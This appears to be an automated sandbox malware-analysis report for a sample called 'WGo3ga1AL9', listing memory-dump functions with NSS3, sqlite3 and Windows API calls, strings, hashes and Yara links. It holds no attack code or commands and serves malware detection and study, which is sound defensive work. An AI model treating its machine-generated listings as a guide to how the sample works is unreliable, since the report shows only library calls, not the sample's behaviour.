                                                                                                                                              • Opcode ID: 9eb7deb08cba97272d51b277239de5fba39c45f640ac4ded50bf9a7e513329c0
                                                                                                                                              • Instruction ID: 5c3fe82d884508c857933dbe296ae6098b294b3e78a8c297cc2df026ba5d5c98
                                                                                                                                              • Opcode Fuzzy Hash: 9eb7deb08cba97272d51b277239de5fba39c45f640ac4ded50bf9a7e513329c0
                                                                                                                                              • Instruction Fuzzy Hash: 750164B1A001009BD710AA68D8129B137E5EF8234CB00087DE9498BB02EB22E85BC395
                                                                                                                                              Function 6C7D4D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C7D4DC3
                                                                                                                                              • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C7D4DE0
                                                                                                                                              Strings
                                                                                                                                              • misuse, xrefs: 6C7D4DD5
                                                                                                                                              • API call with %s database connection pointer, xrefs: 6C7D4DBD
                                                                                                                                              • invalid, xrefs: 6C7D4DB8
                                                                                                                                              • %s at line %d of [%.10s], xrefs: 6C7D4DDA
                                                                                                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C7D4DCB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: sqlite3_log
                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                              • API String ID: 632333372-2974027950
                                                                                                                                              • Opcode ID: 335e5ae5a6ed0ff5de9838da21168db2d39ea575ecd07c14a7ff553b6df72153
                                                                                                                                              • Instruction ID: 173aa99e844b218bcc4ddb4056221ac632ba8fc0a300d233653fa67406181ed0
                                                                                                                                              • Opcode Fuzzy Hash: 335e5ae5a6ed0ff5de9838da21168db2d39ea575ecd07c14a7ff553b6df72153
                                                                                                                                              • Instruction Fuzzy Hash: 0AF0F022A145782ADA105A54CF13F8233554F22318F072DB0EE087BB92D215A850A3C4
                                                                                                                                              Function 6C7D4DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C7D4E30
                                                                                                                                              • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C7D4E4D
                                                                                                                                              Strings
                                                                                                                                              • misuse, xrefs: 6C7D4E42
                                                                                                                                              • API call with %s database connection pointer, xrefs: 6C7D4E2A
                                                                                                                                              • invalid, xrefs: 6C7D4E25
                                                                                                                                              • %s at line %d of [%.10s], xrefs: 6C7D4E47
                                                                                                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C7D4E38
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: sqlite3_log
                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                              • API String ID: 632333372-2974027950
                                                                                                                                              • Opcode ID: 8a435e6fae31825ae79852763290c68bc253509aba9b0facaecbf31f4aced3e4
                                                                                                                                              • Instruction ID: b5f5c2f2d8a70600ab87453edc9b25e05d1410dbc2d1b21d170be9b7c46e4d0e
                                                                                                                                              • Opcode Fuzzy Hash: 8a435e6fae31825ae79852763290c68bc253509aba9b0facaecbf31f4aced3e4
                                                                                                                                              • Instruction Fuzzy Hash: 2DF0E211E449393BEA2012A5DF11F8337AD4B13329F0BA9F1EE0877F92D205A86062E5
                                                                                                                                              Function 00416A10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess$DefaultLangUser
                                                                                                                                              • String ID: *
                                                                                                                                              • API String ID: 1494266314-163128923
                                                                                                                                              • Opcode ID: 8ad7487ebdf551ce844e744865076748c7b192adeb82af89cb9554ed9750e1ed
                                                                                                                                              • Instruction ID: 485b87df60e927c5081145715141aeea1c9fd48c6e3f29f258bd7afdae13bdb0
                                                                                                                                              • Opcode Fuzzy Hash: 8ad7487ebdf551ce844e744865076748c7b192adeb82af89cb9554ed9750e1ed
                                                                                                                                              • Instruction Fuzzy Hash: AFF0E232D8E218EFD3409FE0EC0979CFB31EB05707F064296F60996190E6708A80CB52
                                                                                                                                              Function 6C740C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PR_SetError.NSS3(00000000,00000000,6C741444,?,00000001,?,00000000,00000000,?,?,6C741444,?,?,00000000,?,?), ref: 6C740CB3
                                                                                                                                                • Part of subcall function 6C7AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7AC2BF
                                                                                                                                              • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C741444,?,00000001,?,00000000,00000000,?,?,6C741444,?), ref: 6C740DC1
                                                                                                                                              • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C741444,?,00000001,?,00000000,00000000,?,?,6C741444,?), ref: 6C740DEC
                                                                                                                                                • Part of subcall function 6C760F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C702AF5,?,?,?,?,?,6C700A1B,00000000), ref: 6C760F1A
                                                                                                                                                • Part of subcall function 6C760F10: malloc.MOZGLUE(00000001), ref: 6C760F30
                                                                                                                                                • Part of subcall function 6C760F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C760F42
                                                                                                                                              • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C741444,?,00000001,?,00000000,00000000,?), ref: 6C740DFF
                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C741444,?,00000001,?,00000000), ref: 6C740E16
                                                                                                                                              • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C741444,?,00000001,?,00000000,00000000,?), ref: 6C740E53
                                                                                                                                              • PR_GetCurrentThread.NSS3(?,?,?,?,6C741444,?,00000001,?,00000000,00000000,?,?,6C741444,?,?,00000000), ref: 6C740E65
                                                                                                                                              • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C741444,?,00000001,?,00000000,00000000,?), ref: 6C740E79
                                                                                                                                                • Part of subcall function 6C751560: TlsGetValue.KERNEL32(00000000,?,6C720844,?), ref: 6C75157A
                                                                                                                                                • Part of subcall function 6C751560: EnterCriticalSection.KERNEL32(?,?,?,6C720844,?), ref: 6C75158F
                                                                                                                                                • Part of subcall function 6C751560: PR_Unlock.NSS3(?,?,?,?,6C720844,?), ref: 6C7515B2
                                                                                                                                                • Part of subcall function 6C71B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C721397,00000000,?,6C71CF93,5B5F5EC0,00000000,?,6C721397,?), ref: 6C71B1CB
                                                                                                                                                • Part of subcall function 6C71B1A0: free.MOZGLUE(5B5F5EC0,?,6C71CF93,5B5F5EC0,00000000,?,6C721397,?), ref: 6C71B1D2
                                                                                                                                                • Part of subcall function 6C7189E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C7188AE,-00000008), ref: 6C718A04
                                                                                                                                                • Part of subcall function 6C7189E0: EnterCriticalSection.KERNEL32(?), ref: 6C718A15
                                                                                                                                                • Part of subcall function 6C7189E0: memset.VCRUNTIME140(6C7188AE,00000000,00000132), ref: 6C718A27
                                                                                                                                                • Part of subcall function 6C7189E0: PR_Unlock.NSS3(?), ref: 6C718A35
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1601681851-0
                                                                                                                                              • Opcode ID: 4ce8865620eceaff0b5ebdbfb91dfbfa58f55960e494db4b2f95abdd7ec1dda0
                                                                                                                                              • Instruction ID: afb3b636b3bc1fceb29a5759a8868f894ed0ead2486b5534c0fe9a73a05b807c
                                                                                                                                              • Opcode Fuzzy Hash: 4ce8865620eceaff0b5ebdbfb91dfbfa58f55960e494db4b2f95abdd7ec1dda0
                                                                                                                                              • Instruction Fuzzy Hash: 5651D7F6D002105FEB00AF64DE89EAB37A8AF5521CF554474EC0597B02FB35ED1986A2
                                                                                                                                              Function 6C6F6E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • sqlite3_value_text.NSS3(?,?), ref: 6C6F6ED8
                                                                                                                                              • sqlite3_value_text.NSS3(?,?), ref: 6C6F6EE5
                                                                                                                                              • memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6C6F6FA8
                                                                                                                                              • sqlite3_value_text.NSS3(00000000,?), ref: 6C6F6FDB
                                                                                                                                              • sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6C6F6FF0
                                                                                                                                              • sqlite3_value_blob.NSS3(?,?), ref: 6C6F7010
                                                                                                                                              • sqlite3_value_blob.NSS3(?,?), ref: 6C6F701D
                                                                                                                                              • sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6C6F7052
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1920323672-0
                                                                                                                                              • Opcode ID: c1d1f2148ba4a27345a3d394b9a28ba7cf731c9d9c00df6c92d1e34a04b26439
                                                                                                                                              • Instruction ID: cdac4996a036c3a19ea74bd93bb09e72bb56cf3516e1cd0f73992ec3724dc722
                                                                                                                                              • Opcode Fuzzy Hash: c1d1f2148ba4a27345a3d394b9a28ba7cf731c9d9c00df6c92d1e34a04b26439
                                                                                                                                              • Instruction Fuzzy Hash: 1A619FB1E152068BEB00CB64C9406EEB7B3AF45318F284165D425ABB51E732DD17CB99
                                                                                                                                              Function 6C719C50 Relevance: 12.1, APIs: 8, Instructions: 137COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 6C718850: calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C720715), ref: 6C718859
                                                                                                                                                • Part of subcall function 6C718850: PR_NewLock.NSS3 ref: 6C718874
                                                                                                                                                • Part of subcall function 6C718850: PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C71888D
                                                                                                                                              • PR_NewLock.NSS3 ref: 6C719CAD
                                                                                                                                                • Part of subcall function 6C7C98D0: calloc.MOZGLUE(00000001,00000084,6C6F0936,00000001,?,6C6F102C), ref: 6C7C98E5
                                                                                                                                                • Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07AD
                                                                                                                                                • Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07CD
                                                                                                                                                • Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07D6
                                                                                                                                                • Part of subcall function 6C6F07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C68204A), ref: 6C6F07E4
                                                                                                                                                • Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,6C68204A), ref: 6C6F0864
                                                                                                                                                • Part of subcall function 6C6F07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C6F0880
                                                                                                                                                • Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,6C68204A), ref: 6C6F08CB
                                                                                                                                                • Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(?,?,6C68204A), ref: 6C6F08D7
                                                                                                                                                • Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(?,?,6C68204A), ref: 6C6F08FB
                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C719CE8
                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,6C71ECEC,6C722FCD,00000000,?,6C722FCD,?), ref: 6C719D01
                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,6C71ECEC,6C722FCD,00000000,?,6C722FCD,?), ref: 6C719D38
                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,6C71ECEC,6C722FCD,00000000,?,6C722FCD,?), ref: 6C719D4D
                                                                                                                                              • PR_Unlock.NSS3 ref: 6C719D70
                                                                                                                                              • PR_Unlock.NSS3 ref: 6C719DC3
                                                                                                                                              • PR_NewLock.NSS3 ref: 6C719DDD
                                                                                                                                                • Part of subcall function 6C7188D0: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C720725,00000000,00000058), ref: 6C718906
                                                                                                                                                • Part of subcall function 6C7188D0: EnterCriticalSection.KERNEL32(?), ref: 6C71891A
                                                                                                                                                • Part of subcall function 6C7188D0: PL_ArenaAllocate.NSS3(?,?), ref: 6C71894A
                                                                                                                                                • Part of subcall function 6C7188D0: calloc.MOZGLUE(00000001,6C72072D,00000000,00000000,00000000,?,6C720725,00000000,00000058), ref: 6C718959
                                                                                                                                                • Part of subcall function 6C7188D0: memset.VCRUNTIME140(?,00000000,?), ref: 6C718993
                                                                                                                                                • Part of subcall function 6C7188D0: PR_Unlock.NSS3(?), ref: 6C7189AF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Value$calloc$CriticalEnterLockSectionUnlock$Arena$AllocateInitPoolmemset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3394263606-0
                                                                                                                                              • Opcode ID: 6ff5b5bdb51dcff77ae5d2ba7fbe3a6968886057a685e248a5dd4fd86369a2ee
                                                                                                                                              • Instruction ID: d2e74c426cf38bc6ede8cf96619a502fd68c050ad981e52b120e37d145e503cf
                                                                                                                                              • Opcode Fuzzy Hash: 6ff5b5bdb51dcff77ae5d2ba7fbe3a6968886057a685e248a5dd4fd86369a2ee
                                                                                                                                              • Instruction Fuzzy Hash: 3D519470A187059FDB00EF69C28965ABBF0BF54348F198539D8989BF11E730E845CBD1
                                                                                                                                              Function 6C819EA0 Relevance: 12.1, APIs: 8, Instructions: 136COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C819EC0
                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C819EF9
                                                                                                                                              • _PR_MD_UNLOCK.NSS3(?), ref: 6C819F73
                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C819FA5
                                                                                                                                              • _PR_MD_NOTIFY_CV.NSS3(-00000074), ref: 6C819FCF
                                                                                                                                              • _PR_MD_UNLOCK.NSS3(?), ref: 6C819FF2
                                                                                                                                              • _PR_MD_UNLOCK.NSS3(?), ref: 6C81A01D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalEnterSection
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1904992153-0
                                                                                                                                              • Opcode ID: eba704c88d005b6e57884a7466cbbac63f3f928c2a2d1475d3067e20a8894ec8
                                                                                                                                              • Instruction ID: 7d7f9ba3b631d0264fc366aaf576062ef4eea16a458dd8124c1f3d7a68659cc5
                                                                                                                                              • Opcode Fuzzy Hash: eba704c88d005b6e57884a7466cbbac63f3f928c2a2d1475d3067e20a8894ec8
                                                                                                                                              • Instruction Fuzzy Hash: C851DFB2904602DFCB209F25C58868AB7F0FF14318F15896AD85957F12E731F888CBD2
                                                                                                                                              Function 6C70DCE0 Relevance: 12.1, APIs: 8, Instructions: 90stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PR_Now.NSS3 ref: 6C70DCFA
                                                                                                                                                • Part of subcall function 6C7C9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C810A27), ref: 6C7C9DC6
                                                                                                                                                • Part of subcall function 6C7C9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C810A27), ref: 6C7C9DD1
                                                                                                                                                • Part of subcall function 6C7C9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C7C9DED
                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C70DD40
                                                                                                                                              • CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6C70DD62
                                                                                                                                              • CERT_DestroyCertificate.NSS3(?), ref: 6C70DD71
                                                                                                                                              • CERT_DestroyCertificate.NSS3(00000000), ref: 6C70DD81
                                                                                                                                              • CERT_RemoveCertListNode.NSS3(?), ref: 6C70DD8F
                                                                                                                                                • Part of subcall function 6C7206A0: TlsGetValue.KERNEL32 ref: 6C7206C2
                                                                                                                                                • Part of subcall function 6C7206A0: EnterCriticalSection.KERNEL32(?), ref: 6C7206D6
                                                                                                                                                • Part of subcall function 6C7206A0: PR_Unlock.NSS3 ref: 6C7206EB
                                                                                                                                              • CERT_DestroyCertificate.NSS3(?), ref: 6C70DD9E
                                                                                                                                              • CERT_DestroyCertificate.NSS3(?), ref: 6C70DDB7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CertificateDestroy$Time$CertSystem$CriticalEnterFileFindIssuerListNodeRemoveSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strcmp
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 653623313-0
                                                                                                                                              • Opcode ID: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
                                                                                                                                              • Instruction ID: 6b24a2faabd4a522642c5b9cddf9343c65dc7fc2a4a0e02c49aa52a79c972240
                                                                                                                                              • Opcode Fuzzy Hash: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
                                                                                                                                              • Instruction Fuzzy Hash: 7C21ACF6F012169BDB019EA5DE469AFB7F4AF25318B140032ED08A7701F721E914CBE6
                                                                                                                                              Function 6C703C90 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,6C77460B,?,?), ref: 6C703CA9
                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C703CB9
                                                                                                                                              • PL_HashTableLookup.NSS3(?), ref: 6C703CC9
                                                                                                                                              • SECITEM_DupItem_Util.NSS3(00000000), ref: 6C703CD6
                                                                                                                                              • PR_Unlock.NSS3 ref: 6C703CE6
                                                                                                                                              • CERT_FindCertByDERCert.NSS3(?,00000000), ref: 6C703CF6
                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C703D03
                                                                                                                                              • PR_Unlock.NSS3 ref: 6C703D15
                                                                                                                                                • Part of subcall function 6C7ADD70: TlsGetValue.KERNEL32 ref: 6C7ADD8C
                                                                                                                                                • Part of subcall function 6C7ADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7ADDB4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
